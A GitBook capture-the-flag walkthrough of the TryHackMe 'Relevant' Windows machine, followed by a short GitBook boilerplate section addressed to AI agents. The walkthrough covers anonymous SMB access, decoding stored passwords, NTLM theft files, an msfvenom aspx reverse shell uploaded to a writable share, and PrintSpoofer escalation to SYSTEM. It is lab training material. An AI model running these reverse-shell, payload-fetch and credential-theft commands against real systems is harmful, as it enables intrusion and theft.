> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-relevant.md).

# THM - Relevant

### NMAP

```bash
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2026-02-18T02:47:25+00:00
| ssl-cert: Subject: commonName=Relevant
| Issuer: commonName=Relevant
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-02-17T02:43:09
| Not valid after:  2026-08-19T02:43:09
| MD5:   ee6e:441c:f9c2:07d2:4553:854c:68ad:e7ba
|_SHA-1: f8f8:3f1d:6ef2:abc7:b3c0:40e9:61b2:384a:84a9:5f1e
|_ssl-date: 2026-02-18T02:48:05+00:00; 0s from scanner time.
```

### SMB

Anonymous login is allowed.

```bash
┌──(ajay㉿kali)-[~]
└─$ smbclient -L \\\\10.80.144.64\\                                                   
Password for [WORKGROUP\ajay]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.80.144.64 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

```bash
┌──(ajay㉿kali)-[~]
└─$ smbclient  \\\\10.80.144.64\\nt4wrksv
Password for [WORKGROUP\ajay]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 25 17:46:04 2020
  ..                                  D        0  Sat Jul 25 17:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020

                7735807 blocks of size 4096. 4927374 blocks available
smb: \> mget passwords.txt
Get file passwords.txt? y
getting file \passwords.txt of size 98 as passwords.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> 
```

```bash
┌──(ajay㉿kali)-[~]
└─$ cat passwords.txt               
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk

┌──(ajay㉿kali)-[~]
└─$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
Bob - !P@$$W0rD!123                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
Bill - Juw4nnaM4n420696969!$$$  

```

Found credentials for bill

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.80.144.64 -u Bob -p '!P@$$W0rD!123'                         
SMB         10.80.144.64    445    RELEVANT         [*] Windows 10 / Server 2016 Build 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True) 
SMB         10.80.144.64    445    RELEVANT         [+] Relevant\Bob:!P@$$W0rD!123 
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.80.144.64 -u Bill -p 'Juw4nnaM4n420696969!$$$'
SMB         10.80.144.64    445    RELEVANT         [*] Windows 10 / Server 2016 Build 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True) 
SMB         10.80.144.64    445    RELEVANT         [+] Relevant\Bill:Juw4nnaM4n420696969!$$$ (Guest)

```

Also anonymous access we can write to the smb share.

```bash
┌──(ajay㉿kali)-[~]
└─$ nxc smb 10.80.144.64 -u ' ' -p ' ' --shares                                       
SMB         10.80.144.64    445    RELEVANT         [*] Windows 10 / Server 2016 Build 14393 x64 (name:RELEVANT) (domain:Relevant) (signing:False) (SMBv1:True) 
SMB         10.80.144.64    445    RELEVANT         [+] Relevant\ :  (Guest)
SMB         10.80.144.64    445    RELEVANT         [*] Enumerated shares
SMB         10.80.144.64    445    RELEVANT         Share           Permissions     Remark
SMB         10.80.144.64    445    RELEVANT         -----           -----------     ------
SMB         10.80.144.64    445    RELEVANT         ADMIN$                          Remote Admin
SMB         10.80.144.64    445    RELEVANT         C$                              Default share
SMB         10.80.144.64    445    RELEVANT         IPC$            READ            Remote IPC
SMB         10.80.144.64    445    RELEVANT         nt4wrksv        READ,WRITE 
```

#### SMB Share Write Access

Performing NTLM Theft

```bash
 python3 ntlm_theft.py --generate url --server 192.168.170.217  --filename safe.url
 ─(ajay㉿kali)-[~/Tools/ntlm_theft/safe.url]
└─$ ls
'safe.url-(icon).url'  'safe.url-(url).url'

──(ajay㉿kali)-[~/Tools/ntlm_theft/safe.url]
└─$ smbclient \\\\10.80.144.64\\nt4wrksv                                              
Password for [WORKGROUP\ajay]:
Try "help" to get a list of possible commands.
smb: \> put safe.url-(icon).url
putting file safe.url-(icon).url as \safe.url-(icon).url (0.4 kB/s) (average 0.4 kB/s)
smb: \> put safe.url-(url).url
putting file safe.url-(url).url as \safe.url-(url).url (0.2 kB/s) (average 0.3 kB/s)
```

```bash
┌──(ajay㉿kali)-[~]
└─$ sudo responder -I tun0              
[sudo] password for ajay: 
Sorry, try again.
[sudo] password for ajay: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]

```

Tried the NTLM AUTH BUT Didn't work

Trying for reverse shell

```bash
┌──(ajay㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.170.217 LPORT=1234 -f aspx -o shell.aspx  
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of aspx file: 3665 bytes
Saved as: shell.aspx
                                                                                                                                                                                                                                          
┌──(ajay㉿kali)-[~]
└─$ smbclient \\\\10.80.144.64\\nt4wrksv
Password for [WORKGROUP\ajay]:
Try "help" to get a list of possible commands.
smb: \> put shell.aspx
putting file shell.aspx as \shell.aspx (12.0 kB/s) (average 12.0 kB/s)
smb: \> ls
  .                                   D        0  Tue Feb 17 22:18:35 2026
  ..                                  D        0  Tue Feb 17 22:18:35 2026
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020
  safe.url-(icon).url                 A      112  Tue Feb 17 22:13:06 2026
  safe.url-(url).url                  A       60  Tue Feb 17 22:13:14 2026
  shell.aspx                          A     3665  Tue Feb 17 22:18:35 2026

                7735807 blocks of size 4096. 5099751 blocks available
smb: \> 

```

There is a new port open called 49663 and we can view the shares through it lets access them

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fc0Bz5fPQigLofKwP5Ec2%2Fimage.png?alt=media&amp;token=b2c27d24-3898-4c56-8248-f9b13ae5ab59" alt=""><figcaption></figcaption></figure>

```bash
┌──(ajay㉿kali)-[~]
└─$ nc -lnvp 1234                                                     
listening on [any] 1234 ...
connect to [192.168.170.217] from (UNKNOWN) [10.80.144.64] 49903
id
pwd
whoami
sdkls
shell
^C

```

Netcat shell was not working properly lets's use metasploit.

#### Metasploit Reverse Shell

```bash
msf exploit(multi/handler) > show options

Payload options (windows/x64/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.170.217  yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.
```

```bash
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.170.217:1234 
[*] Sending stage (336 bytes) to 10.80.144.64
[*] Command shell session 1 opened (192.168.170.217:1234 -> 10.80.144.64:49905) at 2026-02-17 22:26:42 -0500

Shell Banner:
Microsoft Windows [Version 10.0.14393]
-----
          

c:\windows\system32\inetsrv>
```

```bash
c:\Users\Bob\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of c:\Users\Bob\Desktop

07/25/2020  01:04 PM    <DIR>          .
07/25/2020  01:04 PM    <DIR>          ..
07/25/2020  07:24 AM                35 user.txt
               1 File(s)             35 bytes
               2 Dir(s)  20,888,301,568 bytes free

c:\Users\Bob\Desktop>more user.txt
more user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}
```

```bash
PS C:\Users> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
**SeImpersonatePrivilege        Impersonate a client after authentication Enabled** 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

### SeImpersonate Privilege via Print Spooler

I am gonna use the print spooler

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ ls
PrintSpoofer64.exe  UOgST_Bk
                                                                                                                                                                                                                                          
┌──(ajay㉿kali)-[~/Downloads]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (<http://0.0.0.0:8000/>) ...
10.82.167.91 - - [17/Feb/2026 23:05:03] "GET /PrintSpoofer64.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.

```

```bash
PS C:\Users\Bob\Desktop> wget <http://192.168.170.217:8000/PrintSpoofer64.exe> -outfile PrintSpoofer64.exe
wget <http://192.168.170.217:8000/PrintSpoofer64.exe> -outfile PrintSpoofer64.exe
PS C:\Users\Bob\Desktop> dir
dir

    Directory: C:\Users\Bob\Desktop

Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
d-----        2/17/2026   8:04 PM                Microsoft                     
-a----        2/17/2026   8:05 PM          27136 PrintSpoofer64.exe            
-a----        7/25/2020   8:24 AM             35 user.txt 
```

## Shell as Administrator

```bash
PS C:\Users\Bob\Desktop> ./PrintSpoofer64.exe -i -c cmd
./PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>
```

```bash
PS C:\USers\Administrator\Desktop> dir
dir

    Directory: C:\USers\Administrator\Desktop

Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----        7/25/2020   8:25 AM             35 root.txt                      

PS C:\USers\Administrator\Desktop> more root.txt
more root.txt
THM{1fk5kf469devly1gl320zafgl345pv}

PS C:\USers\Administrator\Desktop> 
```

### HTTP

Port 80 is running ISS&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmZW9UpzG4bqN60s60rKm%2Fimage.png?alt=media&amp;token=6431f9fc-6354-4f44-bcf4-5ffe7912dd54" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-relevant.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
